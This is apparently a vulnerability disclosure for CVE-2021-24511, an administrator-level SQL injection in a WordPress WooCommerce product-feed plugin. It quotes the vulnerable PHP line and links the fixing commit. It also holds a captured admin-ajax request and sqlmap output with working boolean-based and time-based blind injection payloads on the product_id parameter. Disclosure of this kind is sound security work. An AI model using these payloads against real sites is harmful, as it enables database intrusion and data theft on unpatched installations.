Wp Plugin Purple Xmls Google Product Feed for Woocommerce

Plugin Details

Plugin Name: wp-plugin : purple-xmls-google-product-feed-for-woocommerce
Effected Version : (and most probably lower version's if any)
Vulnerability : Injection
Minimum Level of Access Required : Administrator
CVE Number : CVE-2021-24511
Identified by : Syed Sheeraz Ali
WPScan Reference URL

Disclosure Timeline

Technical Details

Vulnerable File: /core/ajax/wp/fetch_product_ajax.php#352

Vulnerable Code block and parameter:

Administrator level SQLi for parameter product_id

Vulnerable Code: /core/ajax/wp/fetch_product_ajax.php#352

352:        $check = $wpdb->get_row("SELECT COUNT(product_id) as count FROM $table_name WHERE product_id = " . sanitize_text_field($_POST['product_id']));

Fixed Commit: https://plugins.trac.wordpress.org/changeset/2532093/

PoC Screenshots

PoC Screenshot PoC Screenshot PoC Screenshot PoC Screenshot

Steps to reproduce

we do not know how to reach this Parameter from the UI so these are the steps how we reched it after code review. install woocommrece and this plugin then go to create feed go to custom product feed and search something capture the requst in burp change the q params value to given value savep and add these two params with it id Parameter will have a sqli.



POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Length: 162
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-GPC: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1620443683%7C2MZuCYsK7cynrQu2tWF9whgE1vtkxLnVPFHiGsJ9Fi0%7C1471328ee46323d87aa594ee1c6acb9ed6f70fbc9942f0148ff45ad621d76e57; wordpress_test_cookie=WP%20Cookie%20check; tk_ai=woo%3AiQVT6EvbuCedvp65Wb1%2BuUEl; PHPSESSID=d8f8beced189cdd7cb849dedbb8a8383; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1620443683%7C2MZuCYsK7cynrQu2tWF9whgE1vtkxLnVPFHiGsJ9Fi0%7C1ae6e450dc0b415e0d67668228afb2a7317b368b4ef2f0d49e6cbb4b71a6a811; wp-settings-time-1=1620279779
Connection: close

sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:
Parameter: product_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keyword=eewr&searchfilters=sku&security=c3b54163aa&action=cpf_cart_product&feedpath=core/ajax/wp/fetch_product_ajax.php&q=savep&local_cat_ids=1&product_id=1 AND 6853=6853

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: keyword=eewr&searchfilters=sku&security=c3b54163aa&action=cpf_cart_product&feedpath=core/ajax/wp/fetch_product_ajax.php&q=savep&local_cat_ids=1&product_id=1 AND (SELECT 7403 FROM (SELECT(SLEEP(5)))gJUc)
[11:44:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.12
[11:44:42] [INFO] fetching current user
[11:44:42] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:44:42] [INFO] retrieved: bob@localhost
current user: 'bob@localhost'

[*] ending @ 11:44:46 /2021-05-06/